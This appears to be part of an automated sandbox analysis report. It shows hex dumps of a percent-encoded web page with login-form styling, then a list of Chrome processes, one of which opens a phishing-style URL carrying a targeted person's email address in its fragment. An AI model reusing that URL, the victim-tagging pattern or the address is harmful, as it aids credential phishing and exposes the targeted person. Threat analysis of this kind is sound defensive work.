          Data Ascii: C%68%34%2C%68%35%2C%68%36%2C%70%2C%62%6C%6F%63%6B%71%75%6F%74%65%2C%70%72%65%2C%61%2C%61%62%62%72%2C%61%63%72%6F%6E%79%6D%2C%61%64%64%72%65%73%73%2C%62%69%67%2C%63%69%74%65%2C%63%6F%64%65%2C%64%65%6C%2C%64%66%6E%2C%65%6D%2C%69%6D%67%2C%69%6E%73%2C%6B%62%6
          2025-01-10 11:22:12 UTC1369INData Raw: 25 36 34 25 36 35 25 37 34 25 36 31 25 36 39 25 36 43 25 37 33 25 32 43 25 36 36 25 36 39 25 36 37 25 36 33 25 36 31 25 37 30 25 37 34 25 36 39 25 36 46 25 36 45 25 32 43 25 36 36 25 36 39 25 36 37 25 37 35 25 37 32 25 36 35 25 32 43 25 36 36 25 36 46 25 36 46 25 37 34 25 36 35 25 37 32 25 32 43 25 36 38 25 36 35 25 36 31 25 36 34 25 36 35 25 37 32 25 32 43 25 36 38 25 36 37 25 37 32 25 36 46 25 37 35 25 37 30 25 32 43 25 36 44 25 36 35 25 36 45 25 37 35 25 32 43 25 36 45 25 36 31 25 37 36 25 32 43 25 37 33 25 36 35 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 37 42 25 36 34 25 36 39 25 37 33 25 37 30 25 36 43 25 36 31 25 37 39 25 33 41 25 36 32 25 36 43 25 36 46 25 36 33 25 36 42 25 37 44 25 36 32 25 36 46 25 36 34 25 37 39 25 37 42 25 36 43 25 36 39
          Data Ascii: %64%65%74%61%69%6C%73%2C%66%69%67%63%61%70%74%69%6F%6E%2C%66%69%67%75%72%65%2C%66%6F%6F%74%65%72%2C%68%65%61%64%65%72%2C%68%67%72%6F%75%70%2C%6D%65%6E%75%2C%6E%61%76%2C%73%65%63%74%69%6F%6E%7B%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%7D%62%6F%64%79%7B%6C%69
          2025-01-10 11:22:12 UTC1369INData Raw: 36 46 25 36 45 25 36 35 25 37 44 25 32 45 25 36 35 25 37 32 25 37 32 25 36 46 25 37 32 25 37 42 25 36 33 25 36 46 25 36 43 25 36 46 25 37 32 25 33 41 25 32 33 25 36 34 25 36 33 25 33 33 25 33 35 25 33 34 25 33 35 25 33 42 25 37 37 25 36 39 25 36 34 25 37 34 25 36 38 25 33 41 25 33 38 25 33 30 25 32 35 25 33 42 25 36 44 25 36 31 25 37 32 25 36 37 25 36 39 25 36 45 25 33 41 25 33 30 25 32 30 25 36 31 25 37 35 25 37 34 25 36 46 25 33 42 25 37 30 25 36 31 25 36 34 25 36 34 25 36 39 25 36 45 25 36 37 25 32 44 25 37 34 25 36 46 25 37 30 25 33 41 25 33 35 25 37 30 25 37 38 25 37 44 25 32 45 25 36 36 25 36 46 25 37 32 25 36 44 25 32 44 25 36 38 25 36 46 25 36 43 25 36 34 25 36 35 25 37 32 25 37 42 25 36 32 25 36 31 25 36 33 25 36 42 25 36 37 25 37 32 25 36 46 25
          Data Ascii: 6F%6E%65%7D%2E%65%72%72%6F%72%7B%63%6F%6C%6F%72%3A%23%64%63%33%35%34%35%3B%77%69%64%74%68%3A%38%30%25%3B%6D%61%72%67%69%6E%3A%30%20%61%75%74%6F%3B%70%61%64%64%69%6E%67%2D%74%6F%70%3A%35%70%78%7D%2E%66%6F%72%6D%2D%68%6F%6C%64%65%72%7B%62%61%63%6B%67%72%6F%
          2025-01-10 11:22:12 UTC1369INData Raw: 44 25 32 45 25 36 36 25 36 46 25 37 32 25 36 44 25 32 44 25 37 37 25 37 32 25 36 31 25 37 30 25 32 30 25 37 30 25 37 42 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 33 25 36 39 25 37 41 25 36 35 25 33 41 25 33 32 25 33 34 25 37 30 25 37 38 25 37 44 25 32 45 25 36 36 25 36 46 25 37 32 25 36 44 25 32 44 25 37 37 25 37 32 25 36 31 25 37 30 25 32 30 25 36 39 25 36 44 25 36 37 25 37 42 25 36 44 25 36 31 25 37 32 25 36 37 25 36 39 25 36 45 25 33 41 25 33 32 25 33 30 25 37 30 25 37 38 25 37 44 25 32 45 25 36 36 25 36 39 25 36 45 25 37 30 25 37 35 25 37 34 25 37 42 25 37 37 25 36 39 25 36 34 25 37 34 25 36 38 25 33 41 25 33 38 25 33 30 25 32 35 25 33 42 25 36 44 25 36 31 25 37 32 25 36 37 25 36 39 25 36 45 25 33 41 25 33 31 25 33 30 25 37 30 25 37 38 25 32
          Data Ascii: D%2E%66%6F%72%6D%2D%77%72%61%70%20%70%7B%66%6F%6E%74%2D%73%69%7A%65%3A%32%34%70%78%7D%2E%66%6F%72%6D%2D%77%72%61%70%20%69%6D%67%7B%6D%61%72%67%69%6E%3A%32%30%70%78%7D%2E%66%69%6E%70%75%74%7B%77%69%64%74%68%3A%38%30%25%3B%6D%61%72%67%69%6E%3A%31%30%70%78%2
          2025-01-10 11:22:12 UTC1369INData Raw: 25 34 36 25 33 33 25 34 33 25 36 33 25 37 35 25 36 43 25 34 35 25 33 38 25 34 31 25 34 31 25 34 31 25 34 31 25 34 31 25 36 44 25 34 41 25 34 43 25 35 32 25 33 30 25 35 31 25 34 31 25 34 31 25 34 42 25 37 31 25 34 45 25 34 39 25 37 41 25 34 39 25 34 31 25 34 31 25 34 31 25 34 31 25 34 41 25 36 33 25 34 35 25 36 38 25 35 41 25 36 33 25 37 37 25 34 31 25 34 31 25 34 34 25 36 34 25 36 33 25 34 31 25 34 31 25 34 31 25 33 33 25 35 38 25 34 31 25 35 35 25 34 39 25 36 46 25 36 44 25 33 33 25 36 37 25 34 31 25 34 31 25 34 31 25 34 31 25 34 38 25 36 34 25 34 35 25 36 43 25 34 45 25 35 32 25 35 31 25 36 36 25 36 41 25 34 31 25 37 37 25 34 39 25 35 34 25 34 42 25 36 37 25 36 46 25 36 37 25 36 33 25 33 30 25 36 45 25 34 39 25 34 31 25 34 31 25 34 31 25 34 31 25 32 46
          Data Ascii: %46%33%43%63%75%6C%45%38%41%41%41%41%41%6D%4A%4C%52%30%51%41%41%4B%71%4E%49%7A%49%41%41%41%41%4A%63%45%68%5A%63%77%41%41%44%64%63%41%41%41%33%58%41%55%49%6F%6D%33%67%41%41%41%41%48%64%45%6C%4E%52%51%66%6A%41%77%49%54%4B%67%6F%67%63%30%6E%49%41%41%41%41%2F
          2025-01-10 11:22:12 UTC1369INData Raw: 35 41 25 35 31 25 34 31 25 37 39 25 34 44 25 34 34 25 34 35 25 33 35 25 34 43 25 35 34 25 34 31 25 37 41 25 34 43 25 35 34 25 34 31 25 37 39 25 35 36 25 34 34 25 34 35 25 33 34 25 34 46 25 36 41 25 35 31 25 37 39 25 34 46 25 36 41 25 34 35 25 37 37 25 34 42 25 37 41 25 34 31 25 37 38 25 34 46 25 36 41 25 34 31 25 37 37 25 33 39 25 33 39 25 34 41 25 34 39 25 36 44 25 36 37 25 34 31 25 34 31 25 34 31 25 34 33 25 35 36 25 33 30 25 35 32 25 35 36 25 36 38 25 33 30 25 35 41 25 34 37 25 34 36 25 33 30 25 35 41 25 35 34 25 37 30 25 37 34 25 36 32 25 33 32 25 35 32 25 37 30 25 35 41 25 36 45 25 36 42 25 34 31 25 34 44 25 36 41 25 34 31 25 37 38 25 34 46 25 35 33 25 33 30 25 37 37 25 34 44 25 37 39 25 33 30 25 37 37 25 34 44 25 36 43 25 35 31 25 37 38 25 34 46 25
          Data Ascii: 5A%51%41%79%4D%44%45%35%4C%54%41%7A%4C%54%41%79%56%44%45%34%4F%6A%51%79%4F%6A%45%77%4B%7A%41%78%4F%6A%41%77%39%39%4A%49%6D%67%41%41%41%43%56%30%52%56%68%30%5A%47%46%30%5A%54%70%74%62%32%52%70%5A%6E%6B%41%4D%6A%41%78%4F%53%30%77%4D%79%30%77%4D%6C%51%78%4F%
          2025-01-10 11:22:12 UTC1369INData Raw: 35 25 36 43 25 34 45 25 35 32 25 35 31 25 36 36 25 36 41 25 34 31 25 37 37 25 34 39 25 35 34 25 34 43 25 34 31 25 37 33 25 34 32 25 34 43 25 37 34 25 33 37 25 35 39 25 34 31 25 34 31 25 34 31 25 34 31 25 33 31 25 36 42 25 36 43 25 34 35 25 35 31 25 35 36 25 35 31 25 33 34 25 37 39 25 33 37 25 33 32 25 35 33 25 35 34 25 35 31 25 33 36 25 34 33 25 34 44 25 34 32 25 34 33 25 34 36 25 35 30 25 33 33 25 35 33 25 34 45 25 36 39 25 35 33 25 35 33 25 37 39 25 36 42 25 37 36 25 37 36 25 36 46 25 35 35 25 37 34 25 34 35 25 34 34 25 34 37 25 36 35 25 33 37 25 34 33 25 34 35 25 36 36 25 35 31 25 35 37 25 33 36 25 34 45 25 34 39 25 33 31 25 37 33 25 34 45 25 35 32 25 34 35 25 34 33 25 35 35 25 37 34 25 37 38 25 35 38 25 34 31 25 34 32 25 34 42 25 36 46 25 36 36 25 37
          Data Ascii: 5%6C%4E%52%51%66%6A%41%77%49%54%4C%41%73%42%4C%74%37%59%41%41%41%41%31%6B%6C%45%51%56%51%34%79%37%32%53%54%51%36%43%4D%42%43%46%50%33%53%4E%69%53%53%79%6B%76%76%6F%55%74%45%44%47%65%37%43%45%66%51%57%36%4E%49%31%73%4E%52%45%43%55%74%78%58%41%42%4B%6F%66%7
          2025-01-10 11:22:12 UTC1369INData Raw: 25 35 32 25 34 36 25 35 37 25 34 38 25 35 32 25 35 34 25 36 32 25 33 32 25 35 41 25 33 30 25 36 34 25 33 32 25 34 36 25 37 39 25 35 41 25 35 31 25 34 32 25 33 33 25 36 34 25 33 33 25 36 33 25 37 35 25 36 31 25 35 37 25 33 35 25 37 32 25 36 33 25 33 32 25 34 45 25 36 38 25 36 33 25 34 37 25 35 35 25 37 35 25 36 32 25 33 33 25 34 41 25 36 45 25 36 44 25 32 42 25 33 34 25 33 38 25 34 37 25 36 37 25 34 31 25 34 31 25 34 31 25 34 31 25 34 32 25 34 41 25 35 32 25 35 35 25 33 35 25 34 35 25 37 32 25 36 42 25 34 41 25 36 37 25 36 37 25 36 37 25 33 44 25 33 44 25 32 39 25 32 30 25 36 45 25 36 46 25 32 44 25 37 32 25 36 35 25 37 30 25 36 35 25 36 31 25 37 34 25 32 30 25 37 33 25 36 33 25 37 32 25 36 46 25 36 43 25 36 43 25 32 30 25 33 37 25 37 30 25 37 38 25 32 30
          Data Ascii: %52%46%57%48%52%54%62%32%5A%30%64%32%46%79%5A%51%42%33%64%33%63%75%61%57%35%72%63%32%4E%68%63%47%55%75%62%33%4A%6E%6D%2B%34%38%47%67%41%41%41%41%42%4A%52%55%35%45%72%6B%4A%67%67%67%3D%3D%29%20%6E%6F%2D%72%65%70%65%61%74%20%73%63%72%6F%6C%6C%20%37%70%78%20
          2025-01-10 11:22:12 UTC1369INData Raw: 37 38 25 37 34 25 32 44 25 36 31 25 36 43 25 36 39 25 36 37 25 36 45 25 33 41 25 36 43 25 36 35 25 36 36 25 37 34 25 33 42 25 36 34 25 36 39 25 37 33 25 37 30 25 36 43 25 36 31 25 37 39 25 33 41 25 36 32 25 36 43 25 36 46 25 36 33 25 36 42 25 33 42 25 36 44 25 36 31 25 37 32 25 36 37 25 36 39 25 36 45 25 32 44 25 36 32 25 36 46 25 37 34 25 37 34 25 36 46 25 36 44 25 33 41 25 33 32 25 33 30 25 37 30 25 37 38 25 37 44 25 33 43 25 32 46 25 37 33 25 37 34 25 37 39 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 36 43 25 36 39 25 36 45 25 36 42 25 32 30 25 36 39 25 36 34 25 33 44 25 32 32 25 36 36 25 36 31 25 37 36 25 36 39 25 36 33 25 36 46 25 36 45 25 32 32 25 32 30 25 37 32 25
          Data Ascii: 78%74%2D%61%6C%69%67%6E%3A%6C%65%66%74%3B%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%3B%6D%61%72%67%69%6E%2D%62%6F%74%74%6F%6D%3A%32%30%70%78%7D%3C%2F%73%74%79%6C%65%3E%0A%20%20%20%20%0A%20%20%20%20%3C%6C%69%6E%6B%20%69%64%3D%22%66%61%76%69%63%6F%6E%22%20%72%


          Click to jump to process

          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:06:21:58
          Start date:10/01/2025
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:2
          Start time:06:22:02
          Start date:10/01/2025
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1976,i,854267468410415921,12782288246673492753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:3
          Start time:06:22:08
          Start date:10/01/2025
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bowhandmade.pt/.jan2#fritss@boogertmanpta.co.za"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          No disassembly